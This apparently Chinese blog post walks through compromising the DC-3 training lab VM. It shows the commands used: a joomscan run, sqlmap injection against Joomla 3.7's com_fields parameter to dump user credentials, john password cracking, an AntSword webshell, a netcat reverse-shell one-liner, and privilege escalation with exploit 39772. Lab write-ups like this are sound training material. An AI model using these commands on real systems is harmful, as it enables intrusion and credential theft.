DC靶机系列------3

最新推荐文章于 2024-07-12 15:53:09 发布

Hero.Youth

最新推荐文章于 2024-07-12 15:53:09 发布

阅读量147

点赞数

分类专栏： # 靶机实战文章标签：安全

本文链接：https://blog.csdn.net/ppbgi/article/details/117091402

版权

靶机实战专栏收录该内容

11 篇文章 0 订阅

订阅专栏

一、
进行DC3的配置

在这里插入图片描述

二、利用kali进行ip的扫描;

在这里插入图片描述

在这里插入图片描述
在进行开放端口的扫描：

开放端口只有80端口，而且之joomal cms；
在进行目录的扫描：
在这里插入图片描述

在这里插入图片描述
然后使用joomscan进行利用
joomscan安装与使用：https://www.freebuf.com/sectool/181440.html

在这里插入图片描述

perl joomscan.pl ‐u http://192.168.1.166

在这里插入图片描述
同时也得到了joomal 版本与目录

然后利用joomla 3.7的漏洞；
发现Joomla版本号与后台管理地址，使用searchsploit查看是否有可以使用的EXP

发现存在SQL注入，并且进行查看：

在这里插入图片描述

在这里插入图片描述
对目标进行访问

然后用kali自带的sqlmap进行爆破：

sqlmap -u "http://192.168.1.166/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch --dbs -p list[fullordering]

在这里插入图片描述
爆破到目录

然后在进行用户名与密码的爆破：

sqlmap -u "http://192.168.1.166/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

在这里插入图片描述
然后进行密码的解密
创建文件，将密码放入创建的文件中，利用john进行爆破：

从后台进行登录：

记得点击上面的保存

利用中国蚁剑来连接：
但在此之前先找到上传木马的路劲：
在这里插入图片描述
但是在蚁剑中进行shell连接的时候，会报

的错误，所以借鉴其他大神的方式，进行页面编辑：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.166 8888>/tmp/f

在这里插入图片描述
然后在kali中进行监听8888端口：

然后利用pytho获取交互式界面：

在这里插入图片描述

利用39772进行提权；先将39772进行下载，然后将文件中的exploit.tar通过蚁剑上传，

在这里插入图片描述

至此成功！！！！

参考文章1：https://laosec.cn/2021/05/11/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_3/
参考文章2：https://blog.csdn.net/weixin_44288604/article/details/107938527?spm=1001.2014.3001.5501

Hero.Youth

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
DC靶机系列------3

一、进行DC3的配置二、利用kali进行ip的扫描;在进行开放端口的扫描：开放端口只有80端口，而且之joomal cms；在进行目录的扫描：然后使用joomscan进行利用joomscan安装与使用：https://www.freebuf.com/sectool/181440.htmlperl joomscan.pl ‐u http://192.168.1.166同时也得到了joomal 版本与目录然后利用joomla 3.7的漏洞；发现Joomla版本号.
复制链接

扫一扫